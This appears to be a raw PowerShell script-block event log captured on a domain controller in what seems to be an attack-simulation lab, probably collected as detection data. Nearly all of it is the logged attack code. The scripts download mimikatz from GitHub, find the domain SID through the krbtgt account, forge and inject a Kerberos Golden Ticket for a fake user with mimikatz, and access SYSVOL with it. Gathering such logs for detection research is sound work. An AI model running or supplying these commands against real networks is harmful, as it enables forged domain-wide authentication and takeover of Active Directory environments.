4104152150x0105470Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore # get current domain SID if default was used $domain_sid = "S-1-5-21-DEFAULT" If ($domain_sid -Match "DEFAULT") { # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 $domain = gwmi Win32_ComputerSystem | Select -Expand Domain $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) } # create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise @" >%TEMP%\golden.txt 2>&1 ( echo Purge existing tickets and create golden ticket: klist purge $env:TEMP\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit" echo. echo Requesting SYSVOL: dir \\%userdnsdomain%\SYSVOL echo. echo Tickets after requesting SYSVOL: klist echo. echo End of Golden Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { if ($_ -match 'End of Golden Ticket attack') { break } } } while ($false) # dummy loop so that 'break' can be used # show output from new empty session Get-Content $env:TEMP\golden.txt # cleanup temp files Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore}e53865f4-d717-4a63-b23a-ea154769921a 4104152150x0105468Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore # get current domain SID if default was used $domain_sid = "S-1-5-21-DEFAULT" If ($domain_sid -Match "DEFAULT") { # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 $domain = gwmi Win32_ComputerSystem | Select -Expand Domain $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) } # create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise @" >%TEMP%\golden.txt 2>&1 ( echo Purge existing tickets and create golden ticket: klist purge $env:TEMP\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit" echo. echo Requesting SYSVOL: dir \\%userdnsdomain%\SYSVOL echo. echo Tickets after requesting SYSVOL: klist echo. echo End of Golden Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { if ($_ -match 'End of Golden Ticket attack') { break } } } while ($false) # dummy loop so that 'break' can be used # show output from new empty session Get-Content $env:TEMP\golden.txt # cleanup temp files Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore}b63facc9-7b60-497f-8a91-1b9537972461 4104152150x0105130Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}891c78a5-23ca-4e25-8efb-9226a0a1ec48 4104152150x0105128Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}c3279d05-56e3-4db8-bdeb-4591f7aab25f 4104152150x0105061Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force}711dc896-3f4f-4968-a04e-a134b60f1753 4104152150x0105059Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force}83c5e779-3e42-498d-ba9a-e7a7c4074511 4104152150x0105048Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}aa106d5d-1658-4743-abd1-198b246cb07e 4104152150x0105046Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}1a2db65e-0d5c-4b56-83a6-6a4073937309